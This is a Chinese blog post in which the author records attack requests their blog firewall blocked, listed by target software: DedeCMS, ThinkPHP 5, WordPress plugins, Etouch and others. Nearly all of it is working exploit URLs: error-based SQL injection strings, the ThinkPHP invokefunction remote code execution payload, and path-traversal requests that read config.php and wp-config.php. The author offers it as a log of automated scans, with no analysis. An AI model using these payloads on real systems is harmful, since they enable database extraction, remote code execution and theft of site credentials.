织梦用的是php还是thinkphp,常见的程序漏洞渗透语句ThinkPHP/织梦(dede)/WordPress等......

最新推荐文章于 2022-09-14 10:20:03 发布

weixin_39872123

最新推荐文章于 2022-09-14 10:20:03 发布

阅读量1.2k

点赞数

文章标签：织梦用的是php还是thinkphp

都是渗透我博客防火墙里看到的...

我只知道大概的渗透语句,和渗透什么程序的.具体好不好使怎么用我就不知道了...

#织梦

/digg/digg_add.php?id＝1&con＝2&digg_mod＝digg_data%20WHERE%201＝2%20+and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(1234),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23

#thinkphp 5

/index.php?s＝index/think%5Capp/invokefunction&function＝call_user_func_array&vars[0]＝md5&vars[1][]＝1

#不太清楚

/index.php?item_id＝1&list%5Bordering%5D＝&list%5Bselect%5D＝updatexml%280x23%2Cconcat%281%2Cmd5%288888%29%29%2C1%29&option＝com_contenthistory&type_id＝1&view＝history

#不太清楚

/index.php?id＝..%2F..%2FConf%2Fconfig.php&s＝Admin-Data-down

#Etouch2.0

/upload/mobile/index.php?a＝asynclist&c＝category&price_max＝1.0+AND+%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x7e%2Cmd5%281%29%2C0x7e%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29%27

#不清楚

/mobile/plugin/SyncUserInfo.jsp?userIdentifiers＝-1%29union%28select%283%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cstr%2841870%2A40962%29%2Cnull

#不清楚

/member/ajax_membergroup.php?action＝post&membergroup＝%40%60%27%60%2F%2A%2150000Union+%2A%2F+%2F%2A%2150000select+%2A%2F+md5%28997494206%29+--+%40%60%27%60

#thinkphp5

/index.php?s＝index/%5Cthink%5Capp/invokefunction&function＝call_user_func_array&vars%5B0%5D＝phpinfo&vars%5B1%5D%5B%5D＝1

#thinkphp

/index.php?s＝Home/%5Cthink%5Capp/invokefunction&function＝call_user_func_array&vars%5B0%5D＝phpinfo&vars%5B1%5D%5B%5D＝1

/index.php?s＝index/%5Cthink%5Capp/invokefunction&function＝call_user_func_array&vars%5B0%5D＝phpinfo&vars%5B1%5D%5B%5D＝1

#基于 thinkphp 的某 cms

/index.php?a＝company_focus&c＝AjaxPersonal&company_id%5B0%5D＝match&company_id%5B1%5D%5B0%5D＝aaaaaaa%22%29+and+extractvalue%281%2Cconcat%280x7e%2Cmd5%2899999999%29%29%29+--+a&m＝

#织梦

/plus/carbuyaction.php?code＝..%2F..%2F&dopost＝return

#WordPress

/wp-content/plugins/ungallery/source_vuln.php?pic＝../../../../../wp-config.php

/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path＝../../../../../wp-config.php

/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path＝../../../../wp-config.php&file_size＝10

我暂时防火墙拦截到的就这么多...记录一下吧...这种大部分都是全自动扫描的,挺烦人的说实话..

~谢谢打赏~

赏

weixin_39872123

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
织梦用的是php还是thinkphp,常见的程序漏洞渗透语句ThinkPHP/织梦(dede)/WordPress等......

都是渗透我博客防火墙里看到的...我只知道大概的渗透语句,和渗透什么程序的.具体好不好使怎么用我就不知道了...#织梦/digg/digg_add.php?id＝1&con＝2&digg_mod＝digg_data%20WHERE%201＝2%20+and(select%201%20from(select%20count(*),concat((select%20(select%20...
复制链接

扫一扫